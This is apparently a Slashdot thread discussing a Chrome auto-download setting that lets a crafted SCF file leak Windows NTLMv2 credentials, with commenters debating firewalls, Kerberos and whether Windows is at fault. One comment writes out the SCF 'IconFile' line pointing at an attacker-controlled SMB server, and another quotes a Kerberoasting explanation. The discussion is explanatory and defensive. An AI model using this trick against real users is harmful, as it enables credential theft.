Stealing Windows Credentials Using Google Chrome

Orome1 writes: A default setting in Google Chrome, which allows it to download files that it deems safe without prompting the user for a download location, can be exploited by attackers to mount a Windows credential theft attack using specially-crafted SCF shortcut files, DefenseCode researchers have found. What's more, for the attack to work, the victim does not even have to run the automatically downloaded file. Simply opening the download directory in Windows File Explorer will trigger the code icon file location inserted in the file to run, and it will send the victim's username, domain and NTLMv2 password hash to a remote SMB server operated by the attackers.

Firewall Blocked

[darkain]

And this is EXACTLY why all of the LAN > WAN firewalls I manage have SMB/CIFS blocked. There is no reason to send that traffic over WAN. If it is needed for connection to a remote location, that's what a VPN connection is for.

Re:

[darkain]

Most home users at this point DO have firewalls. 1) OS level. 2) NATing routers.

Also, VPN isn't just what the usual spamervertised VPN services are (anonymized internet browsing) . They started as a way for corporate employees to log into their private corporate LANs remotely over the internet. One method assigns a private LAN IP address to the remote machine, and tunnels that over the internet, another uses routing tables between two different private LANs tunneled over the internet. In either of these sit

Re:

[jafiwam]

NAT isn't a firewall, but most consumer routers at this point do have a stateful firewall.

A NAT device will drop non-internally initiated connection attempts unless the user has opened up ports to the inside (not many do) and somehow messed it up.

For purposes of this particular discussion, a NAT device can be lumped in with "firewall".

NTLM - the gift that keeps on giving

[WaffleMonster]

I can't get over the fact in 2017 Microsoft has yet to incorporate a single secure authentication protocol into any of its operating systems. They haven't even tried.

It would be relatively trivial to select a PAKE and make it backwards compatible with existing NT hash databases. They just don't seem to care.

Re:

[WaffleMonster]

they've been using kerberos since like 1999. NTLM is there for backwards compatibility

KERBEROS IS NOT A SECURE AUTHENTICATION PROTOCOL.

No there is nothing wrong my caps lock. I was intentionally shouting.

Re:

[WaffleMonster]

Different AC here; what are some examples of authentication protocols that you consider secure?

Any PAKE with a zero knowledge proof...e.g. SRP, JPAKE.
https://en.wikipedia.org/wiki/... [wikipedia.org]

Specifically with regards to MS-CHAPv2 and Kerberos to be secure it MUST NOT be possible to use material from authentication challenges or responses to conduct an offline brute force password guessing campaign because majority of user passwords are simply unable to withstand one.

I consider an authentication protocol to be secure if it is able to meet all of the following requirements:

1. Authenticating against an attacke

Re: NTLM - the gift that keeps on giving

[buchanmilne]

The Kereberos *protocol* does, as far as I know, satisfy these requirements.

Can you provide any evidence of any implementation besides Microsoft's, not satisfying the requirements in a typical configuration?

Yes, Microsoft's implementation of a Kerberos KDC seems to be broken due to having backwards-compatibility with NTLM, but that doesn't mean that the protocol itself is broken.

Re:

[Creepy]

Yeah, AFAIK the Kerberos and IPsec protocols are secure. That doesn't mean the implementer didn't mess things up. I never heard any complaints about Kerberos on Linux and used it for years (albeit in the early 2000s, so not recently - for LDAP specifically). I've heard of multiple issues with it on Windows, though.

Re:

[WaffleMonster]

The Kereberos *protocol* does, as far as I know, satisfy these requirements.

Can you provide any evidence of any implementation besides Microsoft's, not satisfying the requirements in a typical configuration?

The way people generally secure Kerberos is by deploying PKI (RFC4556) or using any number of widely available transport level privacy schemes. (IPsec, VPNs..etc) the very same options are widely available to shelter plaintext authentication.

The problem is challenge response authentication algorithms provided with Kerberos themselves cannot stand alone. Kerberos cannot survive brute force attack without the communications channel first being protected by a foreign source of trust that isn't a password stor

Re:

[clovis]

they've been using kerberos since like 1999. NTLM is there for backwards compatibility

KERBEROS IS NOT A SECURE AUTHENTICATION PROTOCOL.

No there is nothing wrong my caps lock. I was intentionally shouting.

Please explain using terms appropriate to an audience that understands authentication protocols.

Re:

[WaffleMonster]

--Hey motherfucker, citation needed.

https://www.harmj0y.net/blog/p... [harmj0y.net]

Re: NTLM - the gift that keeps on giving

[buchanmilne]

The problems here seem specific to Microsoft's implementation of Kerberos in their effort to retain backwards compatibility with NTLM.

"If we have an arbitrary SPN that is registered for a domain user account, then the NTLM hash of that userâ(TM)s accountâ(TM)s plaintext password is used for the service ticket creation. This is the key to Kerberoasting."

"Tim realized that because of this, and because part of a TGS requested for an SPN instance is encrypted with the NTLM hash of a service account

Not a browser problem

[omnichad]

This is a Windows problem, not a Chrome problem. Windows shouldn't be sending out credentials unless it knows they belong to the server it's authenticating with. This is like visiting a random web page on the Internet and Chrome helpfully filling in the login box with your bank username and password.

Re:

[Anonymous Coward]

How is automatically downloading random files to peoples computers not a browser problem?

Re:Not a browser problem

[jargonburn]

Simple: downloading this specially crafted .scf has absolutely no effect....until it is opened/parsed by the application "Windows Explorer". The vulnerability is in Explorer, not Chrome.

It'd be like saying that downloading a specially crafted PDF file that will compromise your computer when it's opened is a browser problem. Well, since opening Explorer to your downloads folder is a bit more innocuous, it's a bit worse than that.

Re:Not a browser problem

[Hank the Lion]

Mod parent (and GGP) up.
This is a Widows vulnerability in the way link files are handled, that is mischaracterised as a Chrome vulnerability by the author of the article.
Link files (.LNK and .SCF as well as autorun.inf and maybe others) do not contain the pretty icon that is shown in Windows Explorer, but contain a link address to the file containing the icon.

[Shell]
IconFile=MyPic.ico, or
IconFile=MyProgram.exe

This is the case that was originally targeted by the developers of Windows.
Then came network filesystems. Now, this would also work:
IconFile=\\MyServer\Dir\MyProgram.exe, or even worse:
IconFile=\\180.180.180.180\Dir\MyProgram.exe, where 180.180.180.180 is a server under control of the attacker.

When connecting to a server, Windows helpfully sends your current login credentials, to prevent you from having to re-type them every time.
Only when these do not work does it display a login prompt.

The catch is, that, when you open the directory in which the file is stored in Explorer, the icon is needed for display, and the scf file specifies an icon file on a remote server. So, Explorer accesses the remote server, and the underlying network file system sends your login credentials.

Google has tried to mitigate this problem by adding a .download extension to .LNK files, but had overlooked that .SCF can do exactly the same. Ultimately, this is not Google's fault. The Windows network system should not send login credentials to a server that the user hasn't authenticated to manually before, or should only use authentication mechanisms that are immune to replay attacks or brute forcing. See Wafflemonster's post [slashdot.org] above.

This is an issue that should be addressed by Microsoft for once and for all at the filesystem level, not by browser makers with patchwork on a case-by-case basis.

Re:

[scdeimos]

This is absolutely a Windows problem. It's Windows Explorer initiating the connection and it should *not* be doing that for any files that have a Zone.Identifier alternate data stream (i.e.: any file downloaded from the internet that hasn't yet had the Unblock button clicked in its Properties tab).

Credential sent silently

[manu0601]

Usually when one attempts to connect to a network share, credentials are prompted. Why is it different here? How does Windows decides what credentials should be sent to the attacker's SMB server?

Disable automatic downloading

[CanEHdian]

Just disable automatic downloading by enabling the "ask every time" for the file location. That's a good idea anyway.

Uh

[The MAZZTer]

This can happen with any browser if you configure it right. Once Chrome downloads the file it is in no way part of the process... depending on how exactly the SCF file works it might be considered a Windows bug and Microsoft's responsibility to fix (I didn't look at it too closely). Google will fix this on their end by blacklisting SCF files as dangerous to download, which they already do for many suspicious file types that you typically wouldn't be downloading. This will result in a warning prompt if you t

Won't work on my setup

[swilver]

In my setup nothing is allowed internet access unless going through my proxy. Windows is not privy to what that proxy is... this effectively kills tons of exploits, and of course, Windows own spyware.

It does limit me to software that can be configured to use a proxy, but that doesn't really bother me.